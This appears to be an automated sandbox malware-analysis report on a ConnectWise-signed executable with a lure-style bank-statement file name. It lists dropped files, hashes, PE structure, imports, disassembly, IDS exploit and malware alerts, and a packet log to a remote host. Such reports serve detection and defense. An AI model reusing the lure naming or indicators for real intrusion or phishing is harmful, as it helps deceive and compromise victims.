                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):81696
                                                                                                                                                                                                                                                  Entropy (8bit):5.862223562830496
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                                                                  MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                                                                  SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                                                                  SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                                                                  SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):87
                                                                                                                                                                                                                                                  Entropy (8bit):3.463057265798253
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                                                                                                  MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                                                                                                  SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                                                                                                  SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                                                                                                  SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1835008
                                                                                                                                                                                                                                                  Entropy (8bit):4.4216564290401905
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:zSvfpi6ceLP/9skLmb0OTTWSPHaJG8nAgeMZMMhA2fX4WABlEnNp0uhiTw:+vloTTW+EZMM6DFyn03w
                                                                                                                                                                                                                                                  MD5:1A005DC6D650343D501A917C790F5063
                                                                                                                                                                                                                                                  SHA1:DBBADBFBE5FC4F9A3F4ADD821B0B3267E5481563
                                                                                                                                                                                                                                                  SHA-256:C6A1EB0822C98479186D29EAAA2F98957EE3B6D66682D99144BBEB2F38D77D7D
                                                                                                                                                                                                                                                  SHA-512:49B836559976B49B673CE21D055EBFA4E18DE794D1ECA96CE019CCC0F68012505708DA8D95F8E44E29645741A1A5C1A13274A4A4A4150642EDFD65D40B1102DF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.~...1.................................................................................................................................................................................................................................................................................................................................................*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Entropy (8bit):6.514403774293619
                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                  File name:monthly-eStatementForum120478962.Client.exe
                                                                                                                                                                                                                                                  File size:83'376 bytes
                                                                                                                                                                                                                                                  MD5:27bd2490fd75556aab2df57ea7c1147f
                                                                                                                                                                                                                                                  SHA1:4eb9656ede1fed23fdaeb67815afcd489ded0f77
                                                                                                                                                                                                                                                  SHA256:7d6376247db9e267f27d1d6bf32b48afcab0ad277706fc0135d803645f7852a5
                                                                                                                                                                                                                                                  SHA512:b70743c0c03cad64c9f258db7de324ca083ec15ad922f16460febbe47f018aedcbf83e39d8f2b4a57ff77d71727e11a2585264de9dadb15f0ea18abe1e34b350
                                                                                                                                                                                                                                                  SSDEEP:1536:JoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYX7gxD:TenkyfPAwiMq0RqRfbaxZJYYX
                                                                                                                                                                                                                                                  TLSH:0F835B43B5E18875E9730E3118B1D9B4593FBD110EA48EAF3398426A0F351D19E3AE7B
                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..
                                                                                                                                                                                                                                                  Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                                  Entrypoint:0x401489
                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                  Time Stamp:0x66BBDDB2 [Tue Aug 13 22:26:58 2024 UTC]
                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                                                                  OS Version Minor:1
                                                                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                                                                  File Version Minor:1
                                                                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                                                                                                                                  Import Hash:37d5c89163970dd3cc69230538a1b72b
                                                                                                                                                                                                                                                  Signature Valid:true
                                                                                                                                                                                                                                                  Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                  Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                                  Error Number:0
                                                                                                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                                                                                                  • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                                                                                  • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                                                                                                  Version:3
                                                                                                                                                                                                                                                  Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                                                                                                  Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                                                                                                  Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                                                                                                  Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                  call 00007F5010519DCAh
                                                                                                                                                                                                                                                  jmp 00007F501051987Fh
                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                                  push 00000000h
                                                                                                                                                                                                                                                  call dword ptr [0040B048h]
                                                                                                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                  call dword ptr [0040B044h]
                                                                                                                                                                                                                                                  push C0000409h
                                                                                                                                                                                                                                                  call dword ptr [0040B04Ch]
                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                  call dword ptr [0040B050h]
                                                                                                                                                                                                                                                  pop ebp
                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                                  sub esp, 00000324h
                                                                                                                                                                                                                                                  push 00000017h
                                                                                                                                                                                                                                                  call dword ptr [0040B054h]
                                                                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                                                                  je 00007F5010519A07h
                                                                                                                                                                                                                                                  push 00000002h
                                                                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                                                                  int 29h
                                                                                                                                                                                                                                                  mov dword ptr [004118C0h], eax
                                                                                                                                                                                                                                                  mov dword ptr [004118BCh], ecx
                                                                                                                                                                                                                                                  mov dword ptr [004118B8h], edx
                                                                                                                                                                                                                                                  mov dword ptr [004118B4h], ebx
                                                                                                                                                                                                                                                  mov dword ptr [004118B0h], esi
                                                                                                                                                                                                                                                  mov dword ptr [004118ACh], edi
                                                                                                                                                                                                                                                  mov word ptr [004118D8h], ss
                                                                                                                                                                                                                                                  mov word ptr [004118CCh], cs
                                                                                                                                                                                                                                                  mov word ptr [004118A8h], ds
                                                                                                                                                                                                                                                  mov word ptr [004118A4h], es
                                                                                                                                                                                                                                                  mov word ptr [004118A0h], fs
                                                                                                                                                                                                                                                  mov word ptr [0041189Ch], gs
                                                                                                                                                                                                                                                  pushfd
                                                                                                                                                                                                                                                  pop dword ptr [004118D0h]
                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                  mov dword ptr [004118C4h], eax
                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                  mov dword ptr [004118C8h], eax
                                                                                                                                                                                                                                                  lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                  mov dword ptr [004118D4h], eax
                                                                                                                                                                                                                                                  mov eax, dword ptr [ebp-00000324h]
                                                                                                                                                                                                                                                  mov dword ptr [00411810h], 00010001h
                                                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1060c0x3c.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x130000x1e0.rsrc
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x118000x2db0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x140000xddc.reloc
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xfe380x70.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xfd780x40.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0xb0000x13c.rdata
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                  .text0x10000x9cf80x9e00bae4521030709e187bdbe8a34d7bf731False0.6035650712025317data6.581464957368758IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .rdata0xb0000x5d580x5e00ec94ce6ebdbe57640638e0aa31d08896False0.4178025265957447Applesoft BASIC program data, first line number 14.843224204192078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .data0x110000x11cc0x80004a548a5c04675d08166d3823a6bf61bFalse0.16357421875data2.0120795802951505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                  .rsrc0x130000x1e00x200aa256780346be2e1ee49ac6d69d2faffFalse0.52734375data4.703723272345726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  .reloc0x140000xddc0xe00908329e10a1923a3c4938a10d44237d9False0.7776227678571429data6.495696626464028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                  RT_MANIFEST0x130600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                                  KERNEL32.dllLocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
                                                                                                                                                                                                                                                  CRYPT32.dllCertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA
                                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                  EnglishUnited States
                                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                  2024-11-08T11:01:13.781744+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1194.59.30.201443192.168.2.549722TCP
                                                                                                                                                                                                                                                  2024-11-08T11:01:15.767488+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1194.59.30.201443192.168.2.549724TCP
                                                                                                                                                                                                                                                  2024-11-08T11:01:18.080245+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.549729TCP
                                                                                                                                                                                                                                                  2024-11-08T11:01:21.003552+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1194.59.30.201443192.168.2.549736TCP
                                                                                                                                                                                                                                                  2024-11-08T11:01:22.684812+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1194.59.30.201443192.168.2.549743TCP
                                                                                                                                                                                                                                                  2024-11-08T11:01:25.138450+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1194.59.30.201443192.168.2.549756TCP
                                                                                                                                                                                                                                                  2024-11-08T11:01:26.702035+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1194.59.30.201443192.168.2.549767TCP
                                                                                                                                                                                                                                                  2024-11-08T11:01:32.679860+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1194.59.30.201443192.168.2.549802TCP
                                                                                                                                                                                                                                                  2024-11-08T11:01:37.035829+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1194.59.30.201443192.168.2.549818TCP
                                                                                                                                                                                                                                                  2024-11-08T11:01:55.669523+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.549930TCP
                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:04.016067982 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:04.016123056 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:04.016194105 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:04.097003937 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:04.097029924 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:04.936364889 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:04.936448097 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:04.941138983 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:04.941148996 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:04.941442966 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:04.982817888 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.013277054 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.059329033 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.415880919 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.415909052 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.415916920 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.415925980 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.415955067 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.416040897 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.416053057 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.416196108 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.416196108 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.531009912 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.531035900 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.531095028 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.531112909 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.531137943 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.531166077 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.646428108 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.646459103 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.646501064 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.646528959 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.646543980 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.646574020 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.762099981 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.762126923 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.762206078 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.762223005 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.762273073 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.877706051 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.877729893 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.877796888 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.877819061 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.877861023 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.993299961 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.993324041 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.993388891 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.993417978 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.993432999 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.993463993 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:06.110496044 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:06.110522985 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:06.110575914 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:06.110589981 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:06.110609055 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:06.110645056 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:06.111613989 CET44349705194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:06.111671925 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:06.114449024 CET49705443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:06.621989965 CET49711443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:06.622035980 CET44349711194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:06.622128963 CET49711443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:06.622380018 CET49711443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:06.622395992 CET44349711194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:07.456450939 CET44349711194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:07.464389086 CET49711443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:07.464418888 CET44349711194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:07.901087046 CET44349711194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:07.901118040 CET44349711194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:07.901134968 CET44349711194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:07.901197910 CET49711443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:07.901230097 CET44349711194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:07.901284933 CET49711443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:07.901288033 CET44349711194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:07.901339054 CET49711443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:07.902256966 CET49711443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:12.240732908 CET49722443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:12.240767002 CET44349722194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:12.240859032 CET49722443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:12.241159916 CET49722443192.168.2.5194.59.30.201
